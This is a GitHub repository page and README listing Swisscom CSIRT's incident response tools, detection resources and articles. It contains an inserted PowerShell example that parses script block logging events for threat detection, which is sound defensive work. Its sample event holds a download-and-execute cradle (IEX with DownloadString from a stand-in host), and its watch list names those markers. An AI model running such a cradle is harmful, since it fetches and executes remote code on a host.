https://github.com/swisscom/swisscom-csirt-resources
A curated list of analysis tools and resources created or maintained by Swisscom CSIRT.
- Host: GitHub
- URL: https://github.com/swisscom/swisscom-csirt-resources
- Owner: swisscom
- License: cc0-1.0
- Created: 2021-02-23T12:35:23.000Z (over 5 years ago)
- Default Branch: main
- Last Pushed: 2021-10-28T19:46:34.000Z (over 4 years ago)
- Last Synced: 2025-07-05T06:37:14.285Z (11 months ago)
- Homepage:
- Size: 12.7 KB
- Stars: 7
- Watchers: 16
- Forks: 2
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
README
# Swisscom CSIRT Resources
A curated list of analysis tools and resources created or maintained by Swisscom CSIRT.
Besides the tools listed below, our team also contributes to other projects, among them [Sigma](https://github.com/SigmaHQ/sigma), [KapeFiles](https://github.com/EricZimmerman/KapeFiles), [forensic artifacts](https://github.com/forensicartifacts/artifacts), [RECmd](https://github.com/EricZimmerman/RECmd) and [RegRipper](https://github.com/keydet89/RegRipper3.0).
## Internet articles
Articles covering various activities of the Swisscom CSIRT.
* [Die guten Hacker (The good hackers) [DE], 31 August 2016](https://www.swisscom.ch/de/magazin/datensicherheit-infrastruktur/die-guten-hacker/)
* [Mr Red v. Mr Blue – a stress test for Swisscom, 8 November 2018](https://www.swisscom.ch/en/business/enterprise/themen/security/cyber-security-defense-csirt.html)
* [Paying a visit to the IT fire brigade, 15 May 2020](https://www.swisscom.ch/en/business/enterprise/themen/security/soc-csirt-arbeitstag.html)
* [On the hunt for hidden attackers, 18 September 2020](https://www.swisscom.ch/en/business/enterprise/themen/security/threat-hunting.html)
## Incident Response Tools
* [PowerGRR](https://github.com/swisscom/PowerGRR) - PowerGRR is a PowerShell API client library for GRR Rapid Response automation and scripting; it runs on Windows, Linux and macOS.
* [PowerSponse](https://github.com/swisscom/PowerSponse) - PowerSponse is a PowerShell module focused on targeted containment and remediation during incident response.
* [ArtifactCollectionMatrix](https://github.com/swisscom/ArtifactCollectionMatrix) - Forensic Artifact Collection Tool Matrix.
* [Invoke-Forensics](https://github.com/swisscom/Invoke-Forensics) - Invoke-Forensics provides PowerShell scripts to simplify working with [KAPE](https://www.kroll.com/en/services/cyber-risk/incident-response-litigation-support/kroll-artifact-parser-extractor-kape)'s [targets and modules (KapeFiles)](https://github.com/EricZimmerman/KapeFiles) and [RegRipper](https://github.com/keydet89/RegRipper3.0)'s [plugins](https://github.com/keydet89/RegRipper3.0/tree/master/plugins).
## Detection Resources
* [detections](https://github.com/swisscom/detections) - Threat intelligence and threat detection indicators (IOCs, IOAs) shared by Swisscom CSIRT.
## Log Management Tools
* [PowerShell Splunk Addon](https://github.com/swisscom/splunk-addon-powershell/) - Splunk Add-on for PowerShell provides field extraction for PowerShell event logs.
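What "field extraction for PowerShell event logs" has to deal with, as an added example that is not code from the Swisscom add-on or this repository: a PowerShell function that pulls the EventData fields out of a script block logging event (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and flags common download-cradle markers in the script text. The sample event XML (hostname, SID, ScriptBlockId and URL) is constructed for the example, and the watch list is an assumption, not a Swisscom detection. The function runs in Windows PowerShell 5.1 and PowerShell 7 on any OS; only the commented Get-WinEvent call at the end needs a Windows host with script block logging enabled.

```powershell
# Added example, not code from the Swisscom repository or its Splunk add-on.
# Extracts the fields of a PowerShell script block logging event (Event ID 4104,
# Microsoft-Windows-PowerShell/Operational) from the raw event XML, which is
# the work a Splunk field extraction for these logs does on the indexer.

function ConvertFrom-ScriptBlockEvent {
    [CmdletBinding()]
    param(
        # Event XML as returned by $event.ToXml() (Get-WinEvent) or exported by wevtutil.
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$EventXml
    )
    process {
        [xml]$doc = $EventXml
        # Windows event XML uses a default namespace; XPath needs a prefix bound to it.
        $ns = New-Object System.Xml.XmlNamespaceManager($doc.NameTable)
        $ns.AddNamespace('e', 'http://schemas.microsoft.com/win/2004/08/events/event')

        # EventData holds name/value pairs; for 4104 these are MessageNumber,
        # MessageTotal, ScriptBlockText, ScriptBlockId and Path.
        $data = @{}
        foreach ($d in $doc.SelectNodes('/e:Event/e:EventData/e:Data', $ns)) {
            $data[$d.GetAttribute('Name')] = $d.InnerText
        }

        # Constructed watch list (assumption, not a Swisscom detection): common
        # download-cradle and obfuscation markers. -match is case-insensitive.
        $watch = @('-EncodedCommand', 'FromBase64String', 'DownloadString', 'Invoke-Expression', 'IEX')
        $hits  = @($watch | Where-Object { $data['ScriptBlockText'] -match [regex]::Escape($_) })

        [pscustomobject]@{
            TimeCreated     = [datetime]$doc.SelectSingleNode('/e:Event/e:System/e:TimeCreated', $ns).GetAttribute('SystemTime')
            EventId         = [int]$doc.SelectSingleNode('/e:Event/e:System/e:EventID', $ns).InnerText
            Computer        = $doc.SelectSingleNode('/e:Event/e:System/e:Computer', $ns).InnerText
            ScriptBlockId   = $data['ScriptBlockId']
            # Long script blocks are split over several 4104 events; reassemble by
            # ScriptBlockId in MessageNumber order before matching on the full text.
            MessageNumber   = [int]$data['MessageNumber']
            MessageTotal    = [int]$data['MessageTotal']
            Path            = $data['Path']
            ScriptBlockText = $data['ScriptBlockText']
            Suspicious      = $hits
        }
    }
}

# Constructed sample event: hostname, SID, ScriptBlockId and URL are made up.
$sample = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"/>
    <EventID>4104</EventID>
    <Version>1</Version>
    <Level>3</Level>
    <Task>2</Task>
    <Opcode>15</Opcode>
    <Keywords>0x0</Keywords>
    <TimeCreated SystemTime="2021-10-28T19:46:34.1234567Z"/>
    <EventRecordID>123456</EventRecordID>
    <Execution ProcessID="4321" ThreadID="5678"/>
    <Channel>Microsoft-Windows-PowerShell/Operational</Channel>
    <Computer>WS01.example.net</Computer>
    <Security UserID="S-1-5-21-1111111111-2222222222-3333333333-1001"/>
  </System>
  <EventData>
    <Data Name="MessageNumber">1</Data>
    <Data Name="MessageTotal">1</Data>
    <Data Name="ScriptBlockText">IEX (New-Object Net.WebClient).DownloadString('http://example.com/stage2.ps1')</Data>
    <Data Name="ScriptBlockId">f3a2c1e0-9b7d-4c55-a0e1-2d4f6b8c9a10</Data>
    <Data Name="Path"></Data>
  </EventData>
</Event>
'@

ConvertFrom-ScriptBlockEvent -EventXml $sample | Format-List

# On a Windows host with script block logging enabled, feed live events the same way:
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 200 |
#     ForEach-Object { $_.ToXml() } | ConvertFrom-ScriptBlockEvent |
#     Where-Object { $_.Suspicious.Count -gt 0 }
```

The substring watch list is deliberately simple and will be noisy on real hosts; the point of the function is the field split (ScriptBlockId, MessageNumber/MessageTotal, Path and ScriptBlockText), which is what a Splunk add-on like the one above gives you as searchable fields without writing this parser yourself.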
## Communication Channels
* [Twitter](https://twitter.com/swisscom_csirt) - Swisscom CSIRT on Twitter.
* [FIRST](https://www.first.org/members/teams/swisscom_csirt) - FIRST team page.
## Vulnerability Management
* [Bug Bounty](https://www.swisscom.ch/en/about/security/bug-bounty.html) - Our Bug Bounty programme supports the reporting and quick elimination of security gaps (bugs) in our products and services. We invite both private individuals and organisations to report weak points to our Computer Security Incident Response Team (CSIRT).